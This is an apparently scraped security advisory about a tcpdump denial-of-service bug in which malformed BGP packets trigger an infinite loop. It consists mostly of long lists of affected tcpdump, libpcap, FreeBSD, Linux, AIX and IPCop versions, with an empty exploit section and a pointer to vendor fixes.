+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.5 -STABLE
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4 -STABLE
+ FreeBSD FreeBSD 4.4 -RELENG
+ FreeBSD FreeBSD 4.4
+ FreeBSD FreeBSD 4.3 -STABLE
+ FreeBSD FreeBSD 4.3 -RELENG
+ FreeBSD FreeBSD 4.3 -RELEASE
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2 -STABLE
+ FreeBSD FreeBSD 4.2 -RELEASE
+ FreeBSD FreeBSD 4.2
LBL tcpdump 3.6.3
+ EnGarde Secure Community 2.0
+ EnGarde Secure Community 1.0.1
+ EnGarde Secure Professional 1.5
+ EnGarde Secure Professional 1.2
+ EnGarde Secure Professional 1.1
LBL tcpdump 3.6.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ HP Secure OS software for Linux 1.0
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
LBL tcpdump 3.5.2
LBL tcpdump 3.5 alpha
LBL tcpdump 3.5
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ FreeBSD FreeBSD 3.x
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7
LBL tcpdump 3.4
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
LBL libpcap 0.8.3
IPCop IPCop 1.4.6
IPCop IPCop 1.4.5
IPCop IPCop 1.4.4
IPCop IPCop 1.4.2
IPCop IPCop 1.4.1
IBM AIX 5.3 L
IBM AIX 5.3
Gentoo Linux
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.2.1 -RELEASE
FreeBSD FreeBSD 5.2 -RELENG
FreeBSD FreeBSD 5.2 -RELEASE
FreeBSD FreeBSD 5.2
FreeBSD FreeBSD 5.1 -RELENG
FreeBSD FreeBSD 5.1 -RELEASE/Alpha
FreeBSD FreeBSD 5.1 -RELEASE-p5
FreeBSD FreeBSD 5.1 -RELEASE
FreeBSD FreeBSD 5.1
FreeBSD FreeBSD 5.0 -RELENG
FreeBSD FreeBSD 5.0 -RELEASE-p14
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0

- Vulnerability discussion

The 'tcpdump' utility is prone to a vulnerability that may allow a remote attacker to cause a denial-of-service condition in the software. The issue occurs because of the way tcpdump decodes Border Gateway Protocol (BGP) packets. A remote attacker may send malformed BGP packets to cause the software to enter an infinite loop and hang.

- Exploit

The following proof-of-concept exploits are available:

- Solution

Please see the referenced vendor advisories for details on obtaining and applying fixes.


IBM AIX 5.3

LBL libpcap 0.8.3

IPCop IPCop 1.4.1

IPCop IPCop 1.4.2

IPCop IPCop 1.4.4

IPCop IPCop 1.4.5

IPCop IPCop 1.4.6

Mandriva Linux Mandrake 10.1

Mandriva Linux Mandrake 10.1 x86_64

Mandriva Linux Mandrake 10.2

Mandriva Linux Mandrake 10.2 x86_64

LBL tcpdump 3.7.2

LBL tcpdump 3.8.2

LBL tcpdump 3.8.3

LBL tcpdump 3.9.1

FreeBSD FreeBSD 5.3

IBM AIX 5.3 L

FreeBSD FreeBSD 5.3 -RELEASE

FreeBSD FreeBSD 5.3 -RELENG

FreeBSD FreeBSD 5.3 -STABLE

FreeBSD FreeBSD 5.4 -PRERELEASE

FreeBSD FreeBSD 5.4 -RELEASE

FreeBSD FreeBSD 5.4 -RELENG

- Related references

 

 
